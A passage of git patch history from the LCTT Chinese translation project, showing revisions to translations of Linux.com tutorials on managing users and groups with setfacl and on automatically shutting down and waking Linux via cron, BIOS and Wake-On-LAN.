用户组的成员读和写的权限。为此,你必须要用到 `setfacl` 命令。`setfacl` 命令可以为文件或文件夹设置一个访问控制表(ACL)。 这个命令的结构如下: @@ -134,45 +118,41 @@ sudo chmod -R o-x /EDITORS setfacl OPTION X:NAME:Y /DIRECTORY ``` -其中 OPTION 是可选选项,X 可以是 u(用户)或者是 g (用户组),NAME 是用户或者用户组的名字,/DIRECTORY 是要用到的目录。我们将使用 -m 选项进行修改(modify)。因此,我们给 readers 用户组添加读取权限的命令是: +其中 OPTION 是可选选项,X 可以是 `u`(用户)或者是 `g` (用户组),NAME 是用户或者用户组的名字,/DIRECTORY 是要用到的目录。我们将使用 `-m` 选项进行修改。因此,我们给 readers 用户组添加读取权限的命令是: ``` sudo setfacl -m g:readers:rx -R /DATA ``` -现在 readers 用户组里面的每一个用户都可以读取 /DATA 目录里的文件了,但是他们不能修改里面的内容。 +现在 readers 用户组里面的每一个用户都可以读取 `/DATA` 目录里的文件了,但是他们不能修改里面的内容。 为了给 editors 用户组里面的用户读写权限,我们执行了以下命令: ``` sudo setfacl -m g:editors:rwx -R /DATA ``` + 上述命令将赋予 editors 用户组中的任何成员读取权限,同时保留 readers 用户组的只读权限。 ### 更多的权限控制 使用访问控制表(ACL),你可以实现你所需的权限控制。你可以添加用户到用户组,并且灵活地控制这些用户组对每个目录的权限以达到你的需求。如果想了解上述工具的更多信息,可以执行下列的命令: -* man usradd - -* man addgroup - -* man usermod - -* man sefacl - -* man chown - -* man chmod +* `man usradd` +* `man addgroup` +* `man usermod` +* `man sefacl` +* `man chown` +* `man chmod` -------------------------------------------------------------------------------- via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux -作者:[Jack Wallen ] +作者:[Jack Wallen] 译者:[imquanquan](https://github.com/imquanquan) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c66ccc52bdb0a841bac206168980061a76188e12 Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Tue, 5 Dec 2017 22:43:32 +0800 Subject: [PATCH 0318/1627] Update 20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md --- .../20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md index b0f8e72018..3f0b8a0f50 100644 --- a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md +++ b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -1,3 +1,4 @@ +translating by wenwensnow Randomize your WiFi MAC address on Ubuntu 16.04 ============================================================ From cec664010fec9e893946cc0cfb7b0bd794b82cbe Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 5 Dec 2017 22:43:55 +0800 Subject: [PATCH 0319/1627] PUB:20171201 How to Manage Users with Groups in Linux.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @imquanquan 文章发布地址:https://linux.cn/article-9114-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/imquanquan --- .../20171201 How to Manage Users with Groups in Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171201 How to Manage Users with Groups in Linux.md (100%) diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/published/20171201 How to Manage Users with Groups in Linux.md similarity index 100% rename from translated/tech/20171201 How to Manage Users with Groups in Linux.md rename to published/20171201 How to Manage Users with Groups in Linux.md From b89313e03b88e6234feff0ac3d1d6a929b3c7da9 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Tue, 5 Dec 2017 22:49:08 +0800 Subject: [PATCH 0320/1627] update --- ...ke up and Shut Down Linux Automatically.md | 38 +++++++++++-------- 1 file changed, 22 insertions(+), 16 deletions(-) diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md index 5ed3f2bf10..68e49f1e1b 100644 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -10,35 +10,38 @@ [Creative Commons Attribution][6][The Observatory at Delhi][7] -不要成为一个电能浪费者。如果你的电脑不需要开机就请把他们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭 Linux 。 +不要成为一个电能浪费者。如果你的电脑不需要开机就请把它们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭 Linux 。 ### 系统运行时间 -有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才允许机器关机。我认为比较实际可行的是能够在机器需要节省电能以及在移动硬件发生磨损的情况下,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到下一次进行备份时间。或者,你可以只在特定时间内配置网卡。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 +有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才允许机器关机。我认为比较实际可行的是能够在机器需要节省电能以及在移动硬件发生磨损的情况下,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到它要进行下一次备份。或者,你可以设置你的 Internet 网关只在特定的时间运行。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 ### 系统休眠 -对于不需要一直运行的电脑,使用 root 的 cron 定时任务 或者 /etc/crontab 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 +对于不需要一直运行的电脑,使用 root 的 cron 定时任务或者 /etc/crontab 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 ``` # crontab -e -u root # m h dom mon dow command 15 23 * * * /sbin/shutdown -h now ``` - +以下示例仅在周一至周五运行: ``` 15 23 * * 1-5 /sbin/shutdown -h now ``` +您可以为不同的日期和时间创建多个cron作业。 通过命令 ``man 5 crontab`` 可以了解所有时间和日期的字段。 -一个快速、容易的方式是,使用 /etc/crontab 文件。你必须指定用户: +一个快速、容易的方式是,使用 /etc/crontab 文件。但这样你必须指定用户: ``` 15 23 * * 1-5 root shutdown -h now ``` -实现自动唤醒是一件很酷的事情;我的大多数 SUSE (SUSE Linux)同事都在纽伦堡,因此,为了能够跟同事的计划有几小时的重叠时间我需要在凌晨5点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 +### 自动唤醒 -唤醒 Linux 计算机可能不比关闭它可靠,因此你可能需要尝试不同的办法。你可以使用 远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要使用电源开关将其彻底关闭。 +实现自动唤醒是一件很酷的事情; 我大多数使用 SUSE (SUSE Linux)的同事都在纽伦堡,因此,为了能够跟同事的计划有几小时的重叠时间我需要在凌晨5点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 + +唤醒 Linux 计算机可能不比关闭它稳当,因此你可能需要尝试不同的办法。你可以使用远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒这些方式。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要拔掉电源开关将其彻底关闭。 ### BIOS 唤醒 @@ -55,7 +58,7 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. ### 主机远程唤醒(Wake-On-LAN) -远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN –如果支持—然后启动它,因为它被默认为禁用。 +远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何 Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN ,要是支持的话,必须先启动它,因为它被默认为禁用。 然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 ethtool 命令查看网卡是否支持 Wake-On-LAN : @@ -64,7 +67,8 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. Supports Wake-on: pumbg Wake-on: g ``` - +这条命令输出的 Supports Wake-on字段会告诉你你的网卡现在开启了哪些功能: +    * d -- 禁用 * p -- 物理活动唤醒 @@ -79,14 +83,14 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. * g -- magic packet 唤醒 -* s -- magic packet 设置安全密码 +* s -- 设有密码的 magic packet 唤醒 -man ethtool 并不清楚开关 p 的作用;这表明任何信号都会导致唤醒。在我的测试中,然而,它并没有这么做。Wake-On-Lan 被启动的 Wake-on 参数是 g –- magic packet 唤醒,且当 Wake-On 值已经为 g 时表示网卡已支持 Wake-On-Lan 。如果它没有被启用,你可以通过 ethtool 命令来启用它。 +man ethtool 命令并没说清楚 p 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是g -- magic packet 唤醒,而且显示这个功能已经在启用了。如果它没有被启用,你可以通过 ethtool 命令来启用它。 ``` # ethtool -s eth0 wol g ``` - +这条命令可能会在重启后失效,所以为了确保万无一失,你可以创建个 root 用户的定时任务(cron)在每次重启的时候来执行这条命令。 ``` @reboot /usr/bin/ethtool -s eth0 wol g ``` @@ -99,17 +103,20 @@ Figure 2: Enable Wake on LAN. [Used with permission][9] -另外一个选择是最近的网络管理器版本有一个很好的小复选框能够唤醒局域网(图2)。 +另一个选择是最近的网络管理器版本有一个很好的小复选框来启用Wake-On-LAN(图2)。 这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持 Secure On password,它就不起作用。 -现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要正在唤醒的机器上的网络接口和MAC地址。 +现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要用到的是想要唤醒的机器的网络接口和MAC地址信息。 ``` 30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B ``` +### RTC 唤醒(RTC Alarm Clock) -通过使用实时闹钟来唤醒计算机是最不可靠的方法。查看 [Wake Up Linux With an RTC Alarm Clock][4] ;对于现在的大多数发行版来说这种方法已经有点过时了。下周继续了解更多关于使用RTC唤醒的方法。 +通过使用实时闹钟来唤醒计算机是最不可靠的方法。对于这个方法,可以参看 [Wake Up Linux With an RTC Alarm Clock][4] ;对于现在的大多数发行版来说这种方法已经有点过时了。 + +下周继续了解更多关于使用RTC唤醒的方法。 通过 Linux 基金会和 edX 可以学习更多关于 Linux 的免费 [ Linux 入门][5]教程。 @@ -133,4 +140,3 @@ via:https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux- [8]:https://www.linux.com/licenses/category/used-permission [9]:https://www.linux.com/licenses/category/used-permission - From 204fb18a8d66db22104a0e8ce9d2fd7c4c86fb90 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Tue, 5 Dec 2017 23:00:52 +0800 Subject: [PATCH 0321/1627] update --- .../20171130 Wake up and Shut Down Linux Automatically.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md index 68e49f1e1b..9c02d113e9 100644 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -18,7 +18,7 @@ ### 系统休眠 -对于不需要一直运行的电脑,使用 root 的 cron 定时任务或者 /etc/crontab 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 +对于不需要一直运行的电脑,使用 root 的 cron 定时任务或者 `/etc/crontab` 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 ``` # crontab -e -u root @@ -39,7 +39,7 @@ ### 自动唤醒 -实现自动唤醒是一件很酷的事情; 我大多数使用 SUSE (SUSE Linux)的同事都在纽伦堡,因此,为了能够跟同事的计划有几小时的重叠时间我需要在凌晨5点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 +实现自动唤醒是一件很酷的事情; 我大多数使用 SUSE (SUSE Linux)的同事都在纽伦堡,因此,因此为了跟同事能有几小时一起工作的时间,我不得不需要在凌晨五点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 唤醒 Linux 计算机可能不比关闭它稳当,因此你可能需要尝试不同的办法。你可以使用远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒这些方式。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要拔掉电源开关将其彻底关闭。 @@ -79,7 +79,7 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. * b -- 广播消息唤醒 -* a -- ARP(Address Resolution Protocol)唤醒 +* a -- ARP(Address Resolution Protocol) 唤醒 * g -- magic packet 唤醒 From 8b0e3c185d7b2c03894396db28c6a8ab657c02dd Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Tue, 5 Dec 2017 23:04:43 +0800 Subject: [PATCH 0322/1627] translated by HardworkFish --- ...ke up and Shut Down Linux Automatically.md | 142 ++++++++++++++++++ 1 file changed, 142 insertions(+) create mode 100644 translated/tech/20171130 Wake up and Shut Down Linux Automatically.md diff --git a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md new file mode 100644 index 0000000000..9c02d113e9 --- /dev/null +++ b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -0,0 +1,142 @@ + +自动唤醒和关闭 Linux +===================== + +### [banner.jpg][1] + +![timekeeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) + +了解如何通过配置 Linux 计算机来查看时间,并实现自动唤醒和关闭 Linux + +[Creative Commons Attribution][6][The Observatory at Delhi][7] + +不要成为一个电能浪费者。如果你的电脑不需要开机就请把它们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭 Linux 。 + +### 系统运行时间 + +有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才允许机器关机。我认为比较实际可行的是能够在机器需要节省电能以及在移动硬件发生磨损的情况下,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到它要进行下一次备份。或者,你可以设置你的 Internet 网关只在特定的时间运行。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 + +### 系统休眠 + +对于不需要一直运行的电脑,使用 root 的 cron 定时任务或者 `/etc/crontab` 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 + +``` +# crontab -e -u root +# m h dom mon dow command +15 23 * * * /sbin/shutdown -h now +``` +以下示例仅在周一至周五运行: +``` +15 23 * * 1-5 /sbin/shutdown -h now +``` +您可以为不同的日期和时间创建多个cron作业。 通过命令 ``man 5 crontab`` 可以了解所有时间和日期的字段。 + +一个快速、容易的方式是,使用 /etc/crontab 文件。但这样你必须指定用户: + +``` +15 23 * * 1-5 root shutdown -h now +``` + +### 自动唤醒 + +实现自动唤醒是一件很酷的事情; 我大多数使用 SUSE (SUSE Linux)的同事都在纽伦堡,因此,因此为了跟同事能有几小时一起工作的时间,我不得不需要在凌晨五点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 + +唤醒 Linux 计算机可能不比关闭它稳当,因此你可能需要尝试不同的办法。你可以使用远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒这些方式。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要拔掉电源开关将其彻底关闭。 + +### BIOS 唤醒 + +BIOS 唤醒是最可靠的。我的系统主板 BIOS 有一个易于使用的唤醒调度程序。(Figure 1). Chances are yours does, too. Easy peasy. + +### [fig-1.png][2] + +![wakeup](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) + +Figure 1: My system BIOS has an easy-to-use wakeup scheduler. + +[Used with permission][8] + + +### 主机远程唤醒(Wake-On-LAN) + +远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何 Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN ,要是支持的话,必须先启动它,因为它被默认为禁用。 + +然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 ethtool 命令查看网卡是否支持 Wake-On-LAN : + +``` +# ethtool eth0 | grep -i wake-on + Supports Wake-on: pumbg + Wake-on: g +``` +这条命令输出的 Supports Wake-on字段会告诉你你的网卡现在开启了哪些功能: +    +* d -- 禁用 + +* p -- 物理活动唤醒 + +* u -- 单播消息唤醒 + +* m -- 多播(组播)消息唤醒 + +* b -- 广播消息唤醒 + +* a -- ARP(Address Resolution Protocol) 唤醒 + +* g -- magic packet 唤醒 + +* s -- 设有密码的 magic packet 唤醒 + +man ethtool 命令并没说清楚 p 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是g -- magic packet 唤醒,而且显示这个功能已经在启用了。如果它没有被启用,你可以通过 ethtool 命令来启用它。 + +``` +# ethtool -s eth0 wol g +``` +这条命令可能会在重启后失效,所以为了确保万无一失,你可以创建个 root 用户的定时任务(cron)在每次重启的时候来执行这条命令。 +``` +@reboot /usr/bin/ethtool -s eth0 wol g +``` + +### [fig-2.png][3] + +![wakeonlan](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_7.png?itok=XQAwmHoQ) + +Figure 2: Enable Wake on LAN. + +[Used with permission][9] + +另一个选择是最近的网络管理器版本有一个很好的小复选框来启用Wake-On-LAN(图2)。 + +这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持 Secure On password,它就不起作用。 + +现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要用到的是想要唤醒的机器的网络接口和MAC地址信息。 + +``` +30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B +``` +### RTC 唤醒(RTC Alarm Clock) + +通过使用实时闹钟来唤醒计算机是最不可靠的方法。对于这个方法,可以参看 [Wake Up Linux With an RTC Alarm Clock][4] ;对于现在的大多数发行版来说这种方法已经有点过时了。 + +下周继续了解更多关于使用RTC唤醒的方法。 + +通过 Linux 基金会和 edX 可以学习更多关于 Linux 的免费 [ Linux 入门][5]教程。 + +-------------------------------------------------------------------------------- + +via:https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically + +作者:[Carla Schroder] +译者:[译者ID](https://github.com/HardworkFish) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/bannerjpg +[2]:https://www.linux.com/files/images/fig-1png-11 +[3]:https://www.linux.com/files/images/fig-2png-7 +[4]:https://www.linux.com/learn/wake-linux-rtc-alarm-clock +[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[6]:https://www.linux.com/licenses/category/creative-commons-attribution +[7]:http://www.columbia.edu/itc/mealac/pritchett/00routesdata/1700_1799/jaipur/delhijantarearly/delhijantarearly.html +[8]:https://www.linux.com/licenses/category/used-permission +[9]:https://www.linux.com/licenses/category/used-permission + From 1e85ca2c64981a4ecdfc7566b44986ae7754dd35 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Tue, 5 Dec 2017 23:25:06 +0800 Subject: [PATCH 0323/1627] translated by HardworkFish --- .../20171130 Wake up and Shut Down Linux Automatically.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md index 9c02d113e9..4b02fce189 100644 --- a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -60,7 +60,7 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. 远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何 Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN ,要是支持的话,必须先启动它,因为它被默认为禁用。 -然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 ethtool 命令查看网卡是否支持 Wake-On-LAN : +然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 `ethtool` 命令查看网卡是否支持 Wake-On-LAN : ``` # ethtool eth0 | grep -i wake-on @@ -85,7 +85,7 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. * s -- 设有密码的 magic packet 唤醒 -man ethtool 命令并没说清楚 p 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是g -- magic packet 唤醒,而且显示这个功能已经在启用了。如果它没有被启用,你可以通过 ethtool 命令来启用它。 +man ethtool 命令并没说清楚 p 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是 `g -- magic packet` 唤醒,而且显示这个功能已经在启用了。如果它没有被启用,你可以通过 `ethtool` 命令来启用它。 ``` # ethtool -s eth0 wol g From a07b81629d52df95574f23a897e49a0ada5ace96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Tue, 5 Dec 2017 23:32:38 +0800 Subject: [PATCH 0324/1627] translated by HardworkFish --- .../20171130 Wake up and Shut Down Linux Automatically.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md index 4b02fce189..a4b829620f 100644 --- a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -31,7 +31,7 @@ ``` 您可以为不同的日期和时间创建多个cron作业。 通过命令 ``man 5 crontab`` 可以了解所有时间和日期的字段。 -一个快速、容易的方式是,使用 /etc/crontab 文件。但这样你必须指定用户: +一个快速、容易的方式是,使用 `/etc/crontab ` 文件。但这样你必须指定用户: ``` 15 23 * * 1-5 root shutdown -h now @@ -67,7 +67,7 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. Supports Wake-on: pumbg Wake-on: g ``` -这条命令输出的 Supports Wake-on字段会告诉你你的网卡现在开启了哪些功能: +这条命令输出的 Supports Wake-on 字段会告诉你你的网卡现在开启了哪些功能:     * d -- 禁用 @@ -103,9 +103,9 @@ Figure 2: Enable Wake on LAN. [Used with permission][9] -另一个选择是最近的网络管理器版本有一个很好的小复选框来启用Wake-On-LAN(图2)。 +另一个选择是最近的网络管理器版本有一个很好的小复选框来启用 Wake-On-LAN(图2)。 -这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持 Secure On password,它就不起作用。 +这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持安全密码,它就不起作用。 现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要用到的是想要唤醒的机器的网络接口和MAC地址信息。 From 7d8fba497f003426ad862860bb9ad9f6de586b4e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Tue, 5 Dec 2017 23:35:17 +0800 Subject: [PATCH 0325/1627] finish translation by HardworkFish --- ...ke up and Shut Down Linux Automatically.md | 142 ------------------ 1 file changed, 142 deletions(-) delete mode 100644 sources/tech/20171130 Wake up and Shut Down Linux Automatically.md diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md deleted file mode 100644 index 9c02d113e9..0000000000 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ /dev/null @@ -1,142 +0,0 @@ - -自动唤醒和关闭 Linux -===================== - -### [banner.jpg][1] - -![timekeeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) - -了解如何通过配置 Linux 计算机来查看时间,并实现自动唤醒和关闭 Linux - -[Creative Commons Attribution][6][The Observatory at Delhi][7] - -不要成为一个电能浪费者。如果你的电脑不需要开机就请把它们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭 Linux 。 - -### 系统运行时间 - -有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才允许机器关机。我认为比较实际可行的是能够在机器需要节省电能以及在移动硬件发生磨损的情况下,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到它要进行下一次备份。或者,你可以设置你的 Internet 网关只在特定的时间运行。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 - -### 系统休眠 - -对于不需要一直运行的电脑,使用 root 的 cron 定时任务或者 `/etc/crontab` 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 - -``` -# crontab -e -u root -# m h dom mon dow command -15 23 * * * /sbin/shutdown -h now -``` -以下示例仅在周一至周五运行: -``` -15 23 * * 1-5 /sbin/shutdown -h now -``` -您可以为不同的日期和时间创建多个cron作业。 通过命令 ``man 5 crontab`` 可以了解所有时间和日期的字段。 - -一个快速、容易的方式是,使用 /etc/crontab 文件。但这样你必须指定用户: - -``` -15 23 * * 1-5 root shutdown -h now -``` - -### 自动唤醒 - -实现自动唤醒是一件很酷的事情; 我大多数使用 SUSE (SUSE Linux)的同事都在纽伦堡,因此,因此为了跟同事能有几小时一起工作的时间,我不得不需要在凌晨五点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 - -唤醒 Linux 计算机可能不比关闭它稳当,因此你可能需要尝试不同的办法。你可以使用远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒这些方式。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要拔掉电源开关将其彻底关闭。 - -### BIOS 唤醒 - -BIOS 唤醒是最可靠的。我的系统主板 BIOS 有一个易于使用的唤醒调度程序。(Figure 1). Chances are yours does, too. Easy peasy. - -### [fig-1.png][2] - -![wakeup](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) - -Figure 1: My system BIOS has an easy-to-use wakeup scheduler. - -[Used with permission][8] - - -### 主机远程唤醒(Wake-On-LAN) - -远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何 Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN ,要是支持的话,必须先启动它,因为它被默认为禁用。 - -然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 ethtool 命令查看网卡是否支持 Wake-On-LAN : 